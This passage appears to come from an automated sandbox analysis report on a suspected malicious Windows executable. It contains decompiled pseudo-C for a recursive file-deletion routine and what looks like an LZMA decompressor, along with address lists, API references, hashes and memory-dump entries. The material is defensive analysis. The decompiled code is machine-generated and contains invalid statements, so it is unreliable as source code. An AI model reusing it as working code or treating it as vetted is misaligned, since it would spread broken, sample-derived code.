						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                            0x00405496
                                                                                                            0x0040549a
                                                                                                            0x004054a3
                                                                                                            0x004054a6
                                                                                                            0x004054a9
                                                                                                            0x004054b1
                                                                                                            0x004054b3
                                                                                                            0x004054b4
                                                                                                            0x00000000
                                                                                                            0x004054b4
                                                                                                            0x004054c3
                                                                                                            0x004054c3
                                                                                                            0x004054c6
                                                                                                            0x004054c9
                                                                                                            0x004054dd
                                                                                                            0x004054e4
                                                                                                            0x004054e9
                                                                                                            0x004054eb
                                                                                                            0x004054fb
                                                                                                            0x004054ed
                                                                                                            0x004054f3
                                                                                                            0x004054f3
                                                                                                            0x00405500
                                                                                                            0x00405503
                                                                                                            0x0040550e
                                                                                                            0x00405514
                                                                                                            0x00405519
                                                                                                            0x00405529
                                                                                                            0x0040552b
                                                                                                            0x00405531
                                                                                                            0x00405534
                                                                                                            0x00405537
                                                                                                            0x004055f4
                                                                                                            0x004055f4
                                                                                                            0x004055f8
                                                                                                            0x004055fa
                                                                                                            0x004055fa
                                                                                                            0x004055fa
                                                                                                            0x004055fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040553d
                                                                                                            0x0040553d
                                                                                                            0x00405546
                                                                                                            0x0040554c
                                                                                                            0x00405551
                                                                                                            0x00405554
                                                                                                            0x00405556
                                                                                                            0x0040555a
                                                                                                            0x0040555c
                                                                                                            0x0040555c
                                                                                                            0x0040555a
                                                                                                            0x0040555f
                                                                                                            0x00405562
                                                                                                            0x00405575
                                                                                                            0x00405577
                                                                                                            0x0040557c
                                                                                                            0x00405583
                                                                                                            0x0040559b
                                                                                                            0x004055a1
                                                                                                            0x004055a7
                                                                                                            0x004055a9
                                                                                                            0x004055ce
                                                                                                            0x004055ab
                                                                                                            0x004055ab
                                                                                                            0x004055af
                                                                                                            0x004055c3
                                                                                                            0x004055b1
                                                                                                            0x004055b4
                                                                                                            0x004055b9
                                                                                                            0x004055bb
                                                                                                            0x004055bc
                                                                                                            0x004055bc
                                                                                                            0x004055af
                                                                                                            0x00405585
                                                                                                            0x0040558b
                                                                                                            0x0040558d
                                                                                                            0x00405593
                                                                                                            0x00405593
                                                                                                            0x0040558d
                                                                                                            0x00000000
                                                                                                            0x00405583
                                                                                                            0x00405564
                                                                                                            0x00405567
                                                                                                            0x00405569
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040556b
                                                                                                            0x0040556d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040556f
                                                                                                            0x00405573
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004055d3
                                                                                                            0x004055dd
                                                                                                            0x004055e3
                                                                                                            0x004055e3
                                                                                                            0x004055ee
                                                                                                            0x00000000
                                                                                                            0x004055ee
                                                                                                            0x00405505
                                                                                                            0x0040550c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004054cb
                                                                                                            0x004054cb
                                                                                                            0x004054cd
                                                                                                            0x004055fe
                                                                                                            0x00405601
                                                                                                            0x00405604
                                                                                                            0x00405656
                                                                                                            0x00405656
                                                                                                            0x00405656
                                                                                                            0x00405606
                                                                                                            0x00405609
                                                                                                            0x00405614
                                                                                                            0x00405619
                                                                                                            0x0040561b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040561e
                                                                                                            0x00405624
                                                                                                            0x0040562a
                                                                                                            0x00405630
                                                                                                            0x00405632
                                                                                                            0x00000000
                                                                                                            0x0040564e
                                                                                                            0x00405634
                                                                                                            0x00405638
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040563d
                                                                                                            0x00405642
                                                                                                            0x00405643
                                                                                                            0x00000000
                                                                                                            0x00405644
                                                                                                            0x0040560b
                                                                                                            0x0040560b
                                                                                                            0x00000000
                                                                                                            0x0040560b
                                                                                                            0x004054d3
                                                                                                            0x004054d7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004054d7

                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 004054A9
                                                                                                            • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 004054F3
                                                                                                            • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 00405514
                                                                                                            • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 0040551A
                                                                                                            • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,747DF560), ref: 0040552B
                                                                                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                            • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                            • "C:\Users\user\Desktop\5t2CmTUhKc.exe" , xrefs: 00405495
                                                                                                            • \*.*, xrefs: 004054ED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-3261449311
                                                                                                            • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                            • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                            • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                            • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
